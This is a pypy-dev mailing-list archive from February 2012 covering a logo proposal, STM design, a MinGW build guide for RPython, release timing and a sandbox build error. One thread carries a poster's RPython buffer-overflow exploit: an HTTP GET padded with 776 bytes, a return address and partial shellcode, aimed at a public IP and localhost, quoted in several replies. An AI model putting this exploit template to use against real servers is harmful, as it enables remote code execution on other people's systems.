From fmalina at gmail.com Wed Feb 1 02:22:48 2012 From: fmalina at gmail.com (F Malina) Date: Wed, 1 Feb 2012 01:22:48 +0000 Subject: [pypy-dev] Logo design Message-ID: Hi, Apologies first, as it took me a while to post here; I was launching a new site. As per fijal's request I am posting a logotype here for consideration. SVG - https://www.flatmaterooms.co.uk/ultranet/snakey-v3.2-shadow.svg ZIP archive - https://www.flatmaterooms.co.uk/ultranet/snakey.zip (Comes with 3-color for plotter and shadowed for print and web use; Adobe Illustrator and Inkscape compatible SVG and PDF) More context - https://www.flatmaterooms.co.uk/ultranet/google.html Regarding font choices, the current one could be used, but I am also a big fan of downgrading to plain Arial Black, which could be used in the same position or justified to the width of the logotype below the graphic, with appropriate white-space and grid position, e.g. half the height of the text. All vectors are a hand-drawn interpretation, and the artwork is hereby declared CC share-alike licensed just like the current logo, although I would like the profit from merchandise using the graphics, such as t-shirts or mugs, to go towards PyPy development. Kind regards, Frank http://www.flatmaterooms.co.uk From andrewfr_ice at yahoo.com Wed Feb 1 19:05:25 2012 From: andrewfr_ice at yahoo.com (Andrew Francis) Date: Wed, 1 Feb 2012 10:05:25 -0800 (PST) Subject: [pypy-dev] Question about the STM module and RSTM In-Reply-To: References: <1327954833.79806.YahooMailNeo@web120704.mail.ne1.yahoo.com> Message-ID: <1328119525.65032.YahooMailNeo@web120705.mail.ne1.yahoo.com> Hi Armin: ________________________________ From: Armin Rigo To: Andrew Francis Cc: Py Py Developer Mailing List Sent: Monday, January 30, 2012 3:46 PM Subject: Re: [pypy-dev] Question about the STM module and RSTM >You wouldn't be able to write pure Python versions of classical STM >examples, because the "transaction" module works at a level different >from most STM implementations.
You can try to write RPython versions >of them, just for fun, but they may break at a moment's notice. I would still be interested in writing RPython and Stackless versions. >In PyPy, we look at STM like we would look at the GC. It may be >replaced in a week by a different one, but for the "end user" writing >pure Python code, it essentially doesn't make a difference. That's >why we have no plan at all to let the user access all the details of >the STM library. Even the fact that STM is used is almost an >implementation detail, which has just a few visible consequences >(similar to how the very old versions of Python had a GC based on >refcounting alone, which didn't free loops). Perhaps one reason you would want to expose the STM module is for other language implementations that could use STM? An example: my interest in Stackless Python and PyPy (via stackless.py) came out of wanting to develop a WS-BPEL processor. My initial approach was to write a WS-BPEL to Python pre-processor. PyPy would allow me to write a WS-BPEL processor in ways I couldn't imagine a few years ago. I'm on the fence about WS-BPEL these days. As for your approach: like a lot of people on the blog, it is not the way I understood STM to work. For me this is because Haskell is the only approach I've seen. Reading papers has exposed me to more ideas. I have been reading the text "Transactional Memory, 2nd (2010)" by Harris, Larus, and Rajwar. In one of the sections, they describe an approach called "Transactions Everywhere." The assumption is that transactions are the norm, not the exception, so atomicity is the default. Connected to that is TM based on Automatic Mutual Exclusion (or AME). Roughly, AME is a cooperative multi-threading system that is built over STM. Perhaps this is helpful: you can read the paper "Automatic Mutual Exclusion" (http://research.microsoft.com/en-us/projects/ame/automutex-hotos.pdf) or look at other papers at the site.
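The atomic-by-default idea behind "Transactions Everywhere" / AME can be sketched in a few lines of ordinary Python. This is only a toy illustration, not PyPy's actual machinery: the `atomic` context manager below is a hypothetical helper that fakes atomicity with one global lock, where a real AME runtime would use STM underneath.

```python
import threading

# Toy model of Automatic Mutual Exclusion: shared state is only touched
# inside atomic blocks, and atomic is the default way to run a step of
# work. A single global lock stands in for the real STM machinery.
_big_lock = threading.Lock()

class atomic(object):
    """Hypothetical atomic block; everything inside runs indivisibly."""
    def __enter__(self):
        _big_lock.acquire()
    def __exit__(self, *exc_info):
        _big_lock.release()

counter = [0]

def worker(steps):
    for _ in range(steps):
        with atomic():          # atomicity is the default, not the exception
            counter[0] += 1

threads = [threading.Thread(target=worker, args=(1000,)) for _ in range(4)]
for t in threads:
    t.start()
for t in threads:
    t.join()
print(counter[0])
```

With the lock in place no increments are lost, so the final count is 4000; a real AME system would show the same observable behaviour, but with optimistic transactions instead of a global lock.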
Salut, Andrew -------------- next part -------------- An HTML attachment was scrubbed... URL: From arigo at tunes.org Wed Feb 1 21:36:18 2012 From: arigo at tunes.org (Armin Rigo) Date: Wed, 1 Feb 2012 21:36:18 +0100 Subject: [pypy-dev] Question about the STM module and RSTM In-Reply-To: <1328119525.65032.YahooMailNeo@web120705.mail.ne1.yahoo.com> References: <1327954833.79806.YahooMailNeo@web120704.mail.ne1.yahoo.com> <1328119525.65032.YahooMailNeo@web120705.mail.ne1.yahoo.com> Message-ID: Hi Andrew, On Wed, Feb 1, 2012 at 19:05, Andrew Francis wrote: > Perhaps this is helpful, you can read the paper "Automatic Mutual Exclusion" > (http://research.microsoft.com/en-us/projects/ame/automutex-hotos.pdf) or > look at other papers at the site. Thank you a lot for this reference! This paper describes exactly the same thing as I'm trying to do. It's this kind of usage of transactional memory that I'm interested in. A bientôt, Armin. From andrew.rustytub at gmail.com Sun Feb 5 03:49:12 2012 From: andrew.rustytub at gmail.com (Andrew Evans) Date: Sat, 4 Feb 2012 18:49:12 -0800 Subject: [pypy-dev] Compiling using translate [a small tutorial] Message-ID: I thought I would post a small tutorial on using translate.py to compile PyPy RPython scripts. This tutorial is about how to compile standalone Python executables using RPython. RPython (Restricted Python) is a restricted, statically typed subset of Python. What we will cover in this tutorial is setting up an environment for building src code in RPython. First you will need to download PyPy and MinGW (the PyPy translator is only available in the source of PyPy; we will need translate.py later to compile the executable, so get the latest source using Mercurial). Download Mercurial here *http://mercurial.selenic.com* and install it. Using Mercurial, run this command from your cmd prompt: *hg clone* *https://bitbucket.org/pypy/pypy* Now you will have PyPy downloaded.
I just moved it to the directory C:\pypy for easy reference. Next we will add an Environment Variable for the directory containing translate.py; it should be in C:\pypy\pypy\translator\goal\ (the file translate.py will be in this goal directory). Now you will need to install MinGW * http://sourceforge.net/projects/mingw/files/Automated%20MinGW%20Installer/mingw-get-inst/ * installing the C++ compiler and the MSYS tools as well. Add the bin directory of MinGW to your path, as well as \msys\1.0\bin; so if you installed MinGW to C:\MinGW it would be C:\MinGW\bin and C:\MinGW\msys\1.0\bin. You will need to use MinGW to compile a dll before we can start. This is so we can use CTYPES as well; MinGW will be our compiler for RPython. Now download the libffi source *http://sourceware.org/libffi/* (once again, this will allow for CTYPES in PyPy and MinGW). cd to the libffi source directory (you just downloaded), extract it and type * sh ./configure make* This will create a dll in .libs in the directory where you extracted the libffi srcs. The dll will be called: *libffi-5.dll * Next add this to a folder on your C drive and add it to your Environment Variable/Path. Now you should be able to compile source using *translate.py --cc=mingw32 --output test.exe test.py * obviously changing directories to where your script is. I wrote this originally as a reference for myself last year, but I imagine someone can use it. *cheers Andrew -------------- next part -------------- An HTML attachment was scrubbed... URL: From andrew.rustytub at gmail.com Sun Feb 5 04:18:42 2012 From: andrew.rustytub at gmail.com (Andrew Evans) Date: Sat, 4 Feb 2012 19:18:42 -0800 Subject: [pypy-dev] pypy rsocket problem Message-ID: Hello, I started developing a small exploit framework in Python about a year ago. I will be honest: I did not get very far due to lack of commitment.
But I wish to start on this project again; my idea is simple: I want to write this in PyPy using RPython and be able to compile the exploits into executables. So far, with help from this mailing list, I have been able to compile local_exploits (ones that do not take advantage of any networking) and I am now working towards developing a network-based one as a trial. I like to test the water before I jump in. However, I am having trouble compiling this one and am unsure how to diagnose any errors, and would appreciate any advice any of you have to offer. Below is my code. I removed the shell code; if you wish me to post all of it, please respond with that. from pypy.rlib import rsocket from pypy.rpython.lltypesystem import lltype from pypy.rpython.lltypesystem import rffi def main(argv): PORT = 8080 JUNK = "A" ret = "\x67\x42\xa7\x71" mycode = ("\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49") request = "GET /" for i in range(776): request = request + JUNK request = request + ret request = request + mycode request = request + " HTTP/1.1" request = request + "\r\n" ptr = rffi.str2charp(mycode) # returns a "char*" pointer print ptr print len(request) s = rsocket.RSocket(rsocket.AF_INET, rsocket.SOCK_STREAM) target = rsocket.INETAddress("85.25.149.220", 8080) s.connect(target) s.send((ptr, len(request), 0)) return 0 def target(*args): return main, None *cheers -------------- next part -------------- An HTML attachment was scrubbed...
But I wish to start on this project again, my idea is simple I want to write this in PyPy using RPython and be able to compile the exploits into executables. > > So far with help from this mailing list I have been able to compile local_exploits (ones that do not take advantage of any networking) and I am now working towards developing a network based one as a trial. I like to test the water before I jump in > > However I am having troubles compiling this one and am unsure how to diagnose any errors and would appreciate any advice any of you have to offer. > > Below is my code > > I removed the shell code if you wish me to post all of it please respond with that > > from pypy.rlib import rsocket > from pypy.rpython.lltypesystem import lltype > from pypy.rpython.lltypesystem import rffi > > def main(argv): > PORT = 8080 > JUNK = "A" > ret = "\x67\x42\xa7\x71" > mycode = ("\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49") > > request = "GET /" > for i in range(776): > request = request + JUNK > request = request + ret > request = request + mycode > request = request + " HTTP/1.1" > request = request + "\r\n" > ptr = rffi.str2charp(mycode) # returns a "char*" pointer > print ptr > print len(request) > s = rsocket.RSocket(rsocket.AF_INET, rsocket.SOCK_STREAM) > target = rsocket.INETAddress("85.25.149.220", 8080) > s.connect(target) > s.send((ptr, len(request), 0)) I'm not sure what you're doing with 'ptr' here but it seems like you just want s.send(request, 0) instead > return 0 > > def target(*args): > return main, None > > > *cheers > > > _______________________________________________ > pypy-dev mailing list > pypy-dev at python.org > http://mail.python.org/mailman/listinfo/pypy-dev -- Philip Jenvey From andrew.rustytub at gmail.com Sun Feb 5 06:04:19 2012 From: andrew.rustytub at gmail.com (Andrew Evans) Date: Sat, 4 Feb 2012 21:04:19 -0800 Subject: [pypy-dev] pypy rsocket problem In-Reply-To: <47ECC83F-1AC1-4E56-8A17-3947368D05A3@underboss.org> 
References: <47ECC83F-1AC1-4E56-8A17-3947368D05A3@underboss.org> Message-ID: This is actually what I wanted to do with ptr; sorry, I had to confirm with a friend of mine before posting again. The hex code should be cast to a CCHARP. The problem I am facing is compiling using rsocket: if I remove the send and connect and INETAddress bits it compiles, but as soon as I add INETAddress it refuses to compile. What should I be doing instead? *cheers def main(argv): PORT = 8080 JUNK = "A" ret = "\x67\x42\xa7\x71" hellcode = ("\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49") request = "GET /" for i in range(776): request = request + JUNK request = request + ret request = request + hellcode request = request + " HTTP/1.1" request = request + "\r\n" ptr = rffi.cast(rffi.CCHARP, hellcode) # returns a "char*" pointer #print ptr #print len(request) s = rsocket.RSocket(rsocket.AF_INET, rsocket.SOCK_STREAM) target = rsocket.INETAddress("127.0.0.1", 8080) s.connect(target) s.send(ptr, len(request)) return 0 -------------- next part -------------- An HTML attachment was scrubbed... URL: From andrew.rustytub at gmail.com Sun Feb 5 06:27:50 2012 From: andrew.rustytub at gmail.com (Andrew Evans) Date: Sat, 4 Feb 2012 21:27:50 -0800 Subject: [pypy-dev] pypy rsocket problem In-Reply-To: References: <47ECC83F-1AC1-4E56-8A17-3947368D05A3@underboss.org> Message-ID: Sorry for all the messages. I attached a log of what happens when I try to compile this. *cheers -------------- next part -------------- An HTML attachment was scrubbed...
URL: -------------- next part -------------- [translation:ERROR] Error: [translation:ERROR] Traceback (most recent call last): [translation:ERROR] File "C:\pypy\pypy\translator\goal\translate.py", line 309, in main [translation:ERROR] drv.proceed(goals) [translation:ERROR] File "C:\pypy\pypy\translator\driver.py", line 809, in proceed [translation:ERROR] return self._execute(goals, task_skip = self._maybe_skip()) [translation:ERROR] File "C:\pypy\pypy\translator\tool\taskengine.py", line 116, in _execute [translation:ERROR] res = self._do(goal, taskcallable, *args, **kwds) [translation:ERROR] File "C:\pypy\pypy\translator\driver.py", line 286, in _do [translation:ERROR] res = func() [translation:ERROR] File "C:\pypy\pypy\translator\driver.py", line 323, in task_annotate [translation:ERROR] s = annotator.build_types(self.entry_point, self.inputtypes) [translation:ERROR] File "C:\pypy\pypy\annotation\annrpython.py", line 103, in build_types [translation:ERROR] return self.build_graph_types(flowgraph, inputcells, complete_now=complete_now) [translation:ERROR] File "C:\pypy\pypy\annotation\annrpython.py", line 194, in build_graph_types [translation:ERROR] self.complete() [translation:ERROR] File "C:\pypy\pypy\annotation\annrpython.py", line 250, in complete [translation:ERROR] self.processblock(graph, block) [translation:ERROR] File "C:\pypy\pypy\annotation\annrpython.py", line 448, in processblock [translation:ERROR] self.flowin(graph, block) [translation:ERROR] File "C:\pypy\pypy\annotation\annrpython.py", line 508, in flowin [translation:ERROR] self.consider_op(block.operations[i]) [translation:ERROR] File "C:\pypy\pypy\annotation\annrpython.py", line 710, in consider_op [translation:ERROR] raise_nicer_exception(op, str(graph)) [translation:ERROR] File "C:\pypy\pypy\annotation\annrpython.py", line 707, in consider_op [translation:ERROR] resultcell = consider_meth(*argcells) [translation:ERROR] File "<642-codegen C:\pypy\pypy\annotation\annrpython.py:745>", line 3, in consider_op_simple_call [translation:ERROR] return arg.simple_call(*args) [translation:ERROR] File "C:\pypy\pypy\annotation\unaryop.py", line 175, in simple_call [translation:ERROR] return obj.call(getbookkeeper().build_args("simple_call", args_s)) [translation:ERROR] File "C:\pypy\pypy\annotation\unaryop.py", line 702, in call [translation:ERROR] return bookkeeper.pbc_call(pbc, args) [translation:ERROR] File "C:\pypy\pypy\annotation\bookkeeper.py", line 667, in pbc_call [translation:ERROR] results.append(desc.pycall(schedule, args, s_previous_result, op)) [translation:ERROR] File "C:\pypy\pypy\annotation\description.py", line 289, in pycall [translation:ERROR] result = self.specialize(inputcells, op) [translation:ERROR] File "C:\pypy\pypy\annotation\description.py", line 281, in specialize [translation:ERROR] enforceargs(self, inputcells) # can modify inputcells in-place [translation:ERROR] File "C:\pypy\pypy\annotation\signature.py", line 129, in __call__ [translation:ERROR] s_input = unionof(s_input, s_arg) [translation:ERROR] File "C:\pypy\pypy\annotation\model.py", line 695, in unionof [translation:ERROR] s1 = pair(s1, s2).union() [translation:ERROR] File "C:\pypy\pypy\annotation\binaryop.py", line 903, in union [translation:ERROR] assert False, ("mixing pointer type %r with something else %r" % (p.ll_ptrtype, obj)) [translation:ERROR] AssertionError': mixing pointer type <* Array of Char > with something else SomeString(can_be_None=False) [translation:ERROR] .. v0 = simple_call((function get_nonmovingbuffer), data_0) [translation:ERROR] .. '(pypy.rlib.rsocket:997)RSocket.send' [translation:ERROR] Processing block: [translation:ERROR] block at 9 is a [translation:ERROR] in (pypy.rlib.rsocket:997)RSocket.send [translation:ERROR] containing the following operations: [translation:ERROR] v0 = simple_call((function get_nonmovingbuffer), data_0) [translation:ERROR] v1 = getattr(self_0, ('send_raw')) [translation:ERROR] v2 = len(data_0) [translation:ERROR] v3 = simple_call(v1, v0, v2, flags_0) [translation:ERROR] --end-- [translation] start debugger... > c:\pypy\pypy\annotation\binaryop.py(903)union() -> assert False, ("mixing pointer type %r with something else %r" % (p.ll_ptrtype, obj)) From Ronny.Pfannschmidt at gmx.de Sun Feb 5 09:18:48 2012 From: Ronny.Pfannschmidt at gmx.de (Ronny Pfannschmidt) Date: Sun, 05 Feb 2012 09:18:48 +0100 Subject: [pypy-dev] pypy rsocket problem In-Reply-To: References: Message-ID: <4F2E3B68.20506@gmx.de> why are you even using rpython for code, that's clearly just composing some strings and sending them over a socket (i.e. strikingly app-level)? rpython is NOT indented for app-level development. On 02/05/12 04:18, Andrew Evans wrote: > Hello I started developing a small exploit framework in Python about a year > ago. I will be honest I did not get very far due to lack of commitment. But > I wish to start on this project again, my idea is simple I want to write > this in PyPy using RPython and be able to compile the exploits into > executables. > > So far with help from this mailing list I have been able to compile > local_exploits (ones that do not take advantage of any networking) and I am > now working towards developing a network based one as a trial. I like to > test the water before I jump in > > However I am having troubles compiling this one and am unsure how to > diagnose any errors and would appreciate any advice any of you have to > offer.
> > Below is my code > > I removed the shell code if you wish me to post all of it please respond > with that > > from pypy.rlib import rsocket > from pypy.rpython.lltypesystem import lltype > from pypy.rpython.lltypesystem import rffi > > def main(argv): > PORT = 8080 > JUNK = "A" > ret = "\x67\x42\xa7\x71" > mycode = > ("\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49") > > request = "GET /" > for i in range(776): > request = request + JUNK > request = request + ret > request = request + mycode > request = request + " HTTP/1.1" > request = request + "\r\n" > ptr = rffi.str2charp(mycode) # returns a "char*" pointer > print ptr > print len(request) > s = rsocket.RSocket(rsocket.AF_INET, rsocket.SOCK_STREAM) > target = rsocket.INETAddress("85.25.149.220", 8080) > s.connect(target) > s.send((ptr, len(request), 0)) > return 0 > > def target(*args): > return main, None > > > *cheers > > > > > _______________________________________________ > pypy-dev mailing list > pypy-dev at python.org > http://mail.python.org/mailman/listinfo/pypy-dev -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 900 bytes Desc: OpenPGP digital signature URL: From arigo at tunes.org Sun Feb 5 10:12:06 2012 From: arigo at tunes.org (Armin Rigo) Date: Sun, 5 Feb 2012 10:12:06 +0100 Subject: [pypy-dev] pypy rsocket problem In-Reply-To: <4F2E3B68.20506@gmx.de> References: <4F2E3B68.20506@gmx.de> Message-ID: Hi Andrew, On Sun, Feb 5, 2012 at 09:18, Ronny Pfannschmidt wrote: > rpython is NOT indented for app-level development. Said more diplomatically: you can do whatever you want with RPython, but it was intended to be used to write interpreters for dynamic languages like Python or Prolog or experimental ones like Converge. Even so, I would recommend to first write at least the basics of the interpreter in pure Python, keeping only a (at first) vague idea that it should be RPython in the end. 
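In plain Python, the script from this thread shrinks to ordinary socket code; no rffi, no rsocket, no translation step. A sketch (the request layout mirrors the original post, with the shellcode bytes elided and the host/port left as hypothetical placeholders):

```python
import socket

def build_request(junk_len=776):
    # Same layout as the RPython version: "GET /", padding,
    # return address, payload, then the HTTP request trailer.
    junk = "A" * junk_len
    ret = "\x67\x42\xa7\x71"
    payload = "\xeb\x03\x59\xeb\x05"        # shellcode elided
    return "GET /" + junk + ret + payload + " HTTP/1.1\r\n"

def send_request(host, port):
    # A plain socket replaces RSocket/INETAddress/str2charp entirely.
    s = socket.create_connection((host, port))
    try:
        s.sendall(build_request().encode("latin-1"))
    finally:
        s.close()
```

`sendall` takes the byte string itself, so the length bookkeeping and the char* cast that broke the translation simply disappear.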
RPython was developed with this approach as a target. That is why you may or may not get an answer to your question on this mailing list. Instead, just use regular Python, and complain here or on https://bugs.pypy.org if the performance you get running on PyPy doesn't match your expectations. A bientôt, Armin. From bokr at oz.net Sun Feb 5 16:08:04 2012 From: bokr at oz.net (Bengt Richter) Date: Sun, 05 Feb 2012 07:08:04 -0800 Subject: [pypy-dev] pypy rsocket problem In-Reply-To: <4F2E3B68.20506@gmx.de> References: <4F2E3B68.20506@gmx.de> Message-ID: <4F2E9B54.3090501@oz.net> On 02/05/2012 12:18 AM Ronny Pfannschmidt wrote: > rpython is NOT indented for app-level development. Does indentation work differently in rpython? Regards, Bengt Richter Sorry, could not resist ;-) From andrew.rustytub at gmail.com Sun Feb 5 16:25:19 2012 From: andrew.rustytub at gmail.com (Andrew Evans) Date: Sun, 5 Feb 2012 07:25:19 -0800 Subject: [pypy-dev] pypy rsocket problem In-Reply-To: <4F2E9B54.3090501@oz.net> References: <4F2E3B68.20506@gmx.de> <4F2E9B54.3090501@oz.net> Message-ID: Oh I see, no worries, I don't have to use RPython; I did not realize it was primarily used for compilers. Primarily what I wanted to use it for was the translation into a (small) binary feature. This intrigued me, but I see what you're saying ;-) Thank you for the help. I will continue to use Python rather than RPython for development. *cheers -------------- next part -------------- An HTML attachment was scrubbed...
URL: From andrew.rustytub at gmail.com Sun Feb 5 16:31:07 2012 From: andrew.rustytub at gmail.com (Andrew Evans) Date: Sun, 5 Feb 2012 07:31:07 -0800 Subject: [pypy-dev] pypy rsocket problem In-Reply-To: References: <4F2E3B68.20506@gmx.de> <4F2E9B54.3090501@oz.net> Message-ID: Correction: I did not realize it was primarily used for interpreters. Sorry, it's early. On Sun, Feb 5, 2012 at 7:25 AM, Andrew Evans wrote: > Oh I see no worries I don't have to use RPython, I did not realize it was > primarily used for compilers. Primarily what I wanted to use it for was the > translation into a (small) binary feature > > This intrigued me, but I see what your saying ;-) > > Thank you for the help I will continue to use Python rather than RPython > for development > > *cheers > > > -------------- next part -------------- An HTML attachment was scrubbed... URL: From ian at ianozsvald.com Mon Feb 6 02:44:57 2012 From: ian at ianozsvald.com (Ian Ozsvald) Date: Sun, 5 Feb 2012 22:44:57 -0300 Subject: [pypy-dev] Will PyPy 1.7 be the latest for PyCon, or maybe 1.8? Message-ID: Hi Fijal, Armin, Antonio. I'm re-running my High Performance Python tutorial (from EuroPython 2011) at PyCon this year (which makes me feel rather honoured). I've just downloaded PyPy 1.7 and I'm starting to test my code and make updates. I see a mention of PyPy 1.8 on the Downloads page - is there an estimate of the release date? I'm just curious about whether there's a plan to release it before PyCon. I can use the nightly builds but it'll be nice to reference the 'expected current' version of PyPy in the slides, if it is soon. Cheers (and congrats on all the progress, I'm looking forward to looking at numpypy), Ian. -- Ian Ozsvald (A.I.
researcher) ian at IanOzsvald.com http://IanOzsvald.com http://MorConsulting.com/ http://StrongSteam.com/ http://SocialTiesApp.com/ http://TheScreencastingHandbook.com http://FivePoundApp.com/ http://twitter.com/IanOzsvald From fijall at gmail.com Mon Feb 6 08:58:15 2012 From: fijall at gmail.com (Maciej Fijalkowski) Date: Mon, 6 Feb 2012 09:58:15 +0200 Subject: [pypy-dev] Will PyPy 1.7 be the latest for PyCon, or maybe 1.8? In-Reply-To: References: Message-ID: On Mon, Feb 6, 2012 at 3:44 AM, Ian Ozsvald wrote: > Hi Fijal, Armin, Antonio. I'm re-running my High Performance Python > tutorial (from EuroPython 2011) at PyCon this year (which makes me > feel rather honoured). I've just downloaded PyPy 1.7 and I'm starting > to test my code and make updates. > > I see a mention of PyPy 1.8 on the Downloads page - is there an > estimate of the release date? I'm just curious about whether there's a > plan to release it before PyCon. I can use the nightly builds but > it'll be nice to reference the 'expected current' version of PyPy in > the slides, if it is soon. > > Cheers (and congrats on all the progress, I'm looking forward to > looking at numpypy), > Ian. Hey Ian. 1.8 should definitely be released before pycon. We're working on it. 
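For slides that must name the "expected current" version, the interpreter version can also be read out at runtime rather than hard-coded. A small sketch: `sys.pypy_version_info` is only present on PyPy, hence the fallback to plain `sys.version_info`.

```python
import sys

def interpreter_label():
    # PyPy adds sys.pypy_version_info next to the usual sys.version_info;
    # on CPython the attribute does not exist, so fall back gracefully.
    pypy_ver = getattr(sys, "pypy_version_info", None)
    if pypy_ver is not None:
        return "PyPy %d.%d.%d" % (pypy_ver[0], pypy_ver[1], pypy_ver[2])
    return "CPython %d.%d.%d" % sys.version_info[:3]

print(interpreter_label())
```

This way the label always matches whichever release or nightly build the demo actually runs on.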
Cheers, fijal From kracethekingmaker at gmail.com Mon Feb 6 09:25:33 2012 From: kracethekingmaker at gmail.com (kracekumar ramaraju) Date: Mon, 6 Feb 2012 13:55:33 +0530 Subject: [pypy-dev] Unable to complete pypy sandboxing Message-ID: Hi pypy1.7 translate.py -O2 --sandbox targetpypystandalone.py pypy1.7 translate.py -O2 --sandbox I tried above commands separately, I ended up getting same error message [translation:ERROR] interpreter_astcompiler_codegen.c:28289:53: warning: array subscript is above array bounds [-Warray-bounds] [translation:ERROR] interpreter_astcompiler_codegen.c:28289:53: warning: array subscript is above array bounds [-Warray-bounds] [translation:ERROR] interpreter_astcompiler_codegen.c:28289:53: warning: array subscript is above array bounds [-Warray-bounds] [translation:ERROR] interpreter_astcompiler_codegen.c:28289:53: warning: array subscript is above array bounds [-Warray-bounds] [translation:ERROR] interpreter_astcompiler_codegen.c:28548:53: warning: array subscript is above array bounds [-Warray-bounds] [translation:ERROR] interpreter_astcompiler_codegen.c:28548:53: warning: array subscript is above array bounds [-Warray-bounds] [translation:ERROR] interpreter_astcompiler_codegen.c:28548:53: warning: array subscript is above array bounds [-Warray-bounds] [translation:ERROR] interpreter_astcompiler_codegen.c:28548:53: warning: array subscript is above array bounds [-Warray-bounds] [translation:ERROR] interpreter_astcompiler_codegen.c:28548:53: warning: array subscript is above array bounds [-Warray-bounds] [translation:ERROR] interpreter_astcompiler_codegen.c:28548:53: warning: array subscript is above array bounds [-Warray-bounds] [translation:ERROR] interpreter_astcompiler_codegen.c:28548:53: warning: array subscript is above array bounds [-Warray-bounds] [translation:ERROR] interpreter_astcompiler_codegen.c:28548:53: warning: array subscript is above array bounds [-Warray-bounds] [translation:ERROR] 
interpreter_astcompiler_codegen.c:28548:53: warning: array subscript is above array bounds [-Warray-bounds] [translation:ERROR] debug_print.o: In function `pypy_read_timestamp': [translation:ERROR] debug_print.c:(.text+0x193): undefined reference to `clock_gettime' [translation:ERROR] collect2: ld returned 1 exit status [translation:ERROR] make: *** [pypy-c] Error 1 [translation:ERROR] """) [translation] start debugger... > /home/kracekumar/codes/python/pypy/pypy/translator/platform/__init__.py(130)_handle_error() -> raise CompilationError(stdout, stderr) (Pdb+) exit Am I missing something in installation ? or my compilation technique is wrong ? -- * Thanks & Regards "Talk is cheap, show me the code" -- Linus Torvalds kracekumar www.kracekumar.com * -------------- next part -------------- An HTML attachment was scrubbed... URL: From fijall at gmail.com Mon Feb 6 09:30:55 2012 From: fijall at gmail.com (Maciej Fijalkowski) Date: Mon, 6 Feb 2012 10:30:55 +0200 Subject: [pypy-dev] Unable to complete pypy sandboxing In-Reply-To: References: Message-ID: On Mon, Feb 6, 2012 at 10:25 AM, kracekumar ramaraju wrote: > Hi > > ? pypy1.7 translate.py -O2 --sandbox targetpypystandalone.py > ? 
pypy1.7 translate.py -O2 --sandbox > > I tried above commands separately, I ended up getting same error message > > [translation:ERROR] interpreter_astcompiler_codegen.c:28289:53: warning: > array subscript is above array bounds [-Warray-bounds] > [translation:ERROR] interpreter_astcompiler_codegen.c:28289:53: warning: > array subscript is above array bounds [-Warray-bounds] > [translation:ERROR] interpreter_astcompiler_codegen.c:28289:53: warning: > array subscript is above array bounds [-Warray-bounds] > [translation:ERROR] interpreter_astcompiler_codegen.c:28289:53: warning: > array subscript is above array bounds [-Warray-bounds] > [translation:ERROR] interpreter_astcompiler_codegen.c:28548:53: warning: > array subscript is above array bounds [-Warray-bounds] > [translation:ERROR] interpreter_astcompiler_codegen.c:28548:53: warning: > array subscript is above array bounds [-Warray-bounds] > [translation:ERROR] interpreter_astcompiler_codegen.c:28548:53: warning: > array subscript is above array bounds [-Warray-bounds] > [translation:ERROR] interpreter_astcompiler_codegen.c:28548:53: warning: > array subscript is above array bounds [-Warray-bounds] > [translation:ERROR] interpreter_astcompiler_codegen.c:28548:53: warning: > array subscript is above array bounds [-Warray-bounds] > [translation:ERROR] interpreter_astcompiler_codegen.c:28548:53: warning: > array subscript is above array bounds [-Warray-bounds] > [translation:ERROR] interpreter_astcompiler_codegen.c:28548:53: warning: > array subscript is above array bounds [-Warray-bounds] > [translation:ERROR] interpreter_astcompiler_codegen.c:28548:53: warning: > array subscript is above array bounds [-Warray-bounds] > [translation:ERROR] interpreter_astcompiler_codegen.c:28548:53: warning: > array subscript is above array bounds [-Warray-bounds] > [translation:ERROR] debug_print.o: In function `pypy_read_timestamp': > [translation:ERROR] debug_print.c:(.text+0x193): undefined reference to > `clock_gettime' > 
[translation:ERROR] collect2: ld returned 1 exit status > [translation:ERROR] make: *** [pypy-c] Error 1 > [translation:ERROR] """) > [translation] start debugger... >> >> /home/kracekumar/codes/python/pypy/pypy/translator/platform/__init__.py(130)_handle_error() > -> raise CompilationError(stdout, stderr) > (Pdb+) exit > > Am I missing something in installation ? or my compilation technique is > wrong ? > -- > Thanks & Regards > > "Talk is cheap, show me the code" -- Linus Torvalds > kracekumar > www.kracekumar.com > > > _______________________________________________ > pypy-dev mailing list > pypy-dev at python.org > http://mail.python.org/mailman/listinfo/pypy-dev > What's your operating system? Cheers, fijal From arigo at tunes.org Mon Feb 6 09:54:38 2012 From: arigo at tunes.org (Armin Rigo) Date: Mon, 6 Feb 2012 09:54:38 +0100 Subject: [pypy-dev] Unable to complete pypy sandboxing In-Reply-To: References: Message-ID: Hi, On Mon, Feb 6, 2012 at 09:25, kracekumar ramaraju wrote: > [translation:ERROR] debug_print.c:(.text+0x193): undefined reference to > `clock_gettime' Your OS's include files define CLOCK_THREAD_CPUTIME_ID, but not clock_gettime(), which sounds strange. The issue is probably that the "-lrt" option to "ld" is missing. What OS is it? Also, what exact version of PyPy are you using? We fixed a few things here recently. A bientôt, Armin. From fijall at gmail.com Mon Feb 6 10:02:02 2012 From: fijall at gmail.com (Maciej Fijalkowski) Date: Mon, 6 Feb 2012 11:02:02 +0200 Subject: [pypy-dev] Unable to complete pypy sandboxing In-Reply-To: References: Message-ID: On Mon, Feb 6, 2012 at 10:54 AM, Armin Rigo wrote: > Hi, > > On Mon, Feb 6, 2012 at 09:25, kracekumar ramaraju > wrote: >> [translation:ERROR] debug_print.c:(.text+0x193): undefined reference to >> `clock_gettime' > > Your OS's include files define CLOCK_THREAD_CPUTIME_ID, but not > clock_gettime(), which sounds strange. The issue is probably that the > "-lrt" option to "ld" is missing.
